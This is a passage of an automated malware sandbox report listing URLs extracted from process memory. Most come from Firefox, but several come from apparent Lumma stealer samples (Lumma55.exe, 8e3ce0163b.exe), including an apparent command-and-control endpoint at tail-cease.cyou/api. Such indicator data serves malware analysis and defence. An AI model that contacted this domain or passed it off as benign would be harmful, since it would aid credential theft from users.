Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000018.00000002.2937893099.000001DE0BE80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2929242704.000001DE07503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&c
Source: firefox.exe, 00000018.00000002.2827987357.000001DE000B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2921111201.000001DE07386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000018.00000002.2946552739.000001DE0E41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/usergetValue/preffedBlockRegions
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878398866.000001DE049EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/ExtensionStorageSync.sys.mjs
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878398866.000001DE049EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: Lumma55.exe, 00000006.00000003.2503681891.000000000577E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588035778.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723362254.0000000005521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/Exception
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881732812.000001DE057D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/resource:///modules/UrlbarProviderOpenTabs
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpchrome://browser/con
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000018.00000002.2894887062.000001DE068BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000018.00000002.2921111201.000001DE07392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsthe
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesstartMigration
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/addons/siteperms-addon-util
Source: 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Lumma55.exe, 00000006.00000003.2503681891.000000000577C000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2503917252.0000000005775000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2526442420.0000000005775000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2526135970.0000000005775000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588158003.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2611275787.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588035778.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2611131031.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723592255.0000000005518000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723362254.000000000551F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Lumma55.exe, 00000006.00000003.2503917252.0000000005750000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588158003.0000000005A74000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723592255.00000000054F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Lumma55.exe, 00000006.00000003.2503681891.000000000577C000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2503917252.0000000005775000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2526442420.0000000005775000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2526135970.0000000005775000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588158003.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2611275787.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588035778.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2611131031.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723592255.0000000005518000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723362254.000000000551F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Lumma55.exe, 00000006.00000003.2503917252.0000000005750000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2588158003.0000000005A74000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2723592255.00000000054F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Lumma55.exe, 00000006.00000003.2647564315.00000000012B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/
Source: Lumma55.exe, 00000006.00000003.2550423732.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2551466487.00000000012B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/2
Source: Lumma55.exe, 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2577284988.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000002.2665386780.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000002.2665386780.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2550423732.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2551466487.00000000012B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/api
Source: Lumma55.exe, 00000006.00000003.2601693053.00000000012B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/api8
Source: Lumma55.exe, 00000006.00000003.2550423732.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2551466487.00000000012B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/apidjp
Source: Lumma55.exe, 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2577284988.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/apiu4J
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/pi
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou/uo
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001232000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou:443/api
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001232000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou:443/api(x
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001232000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou:443/api:
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001232000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou:443/apiion.txtPK
Source: Lumma55.exe, 00000006.00000002.2665386780.0000000001232000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tail-cease.cyou:443/apin.txtPK
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2940438260.000001DE0C003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2809101193.000001DE0BF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
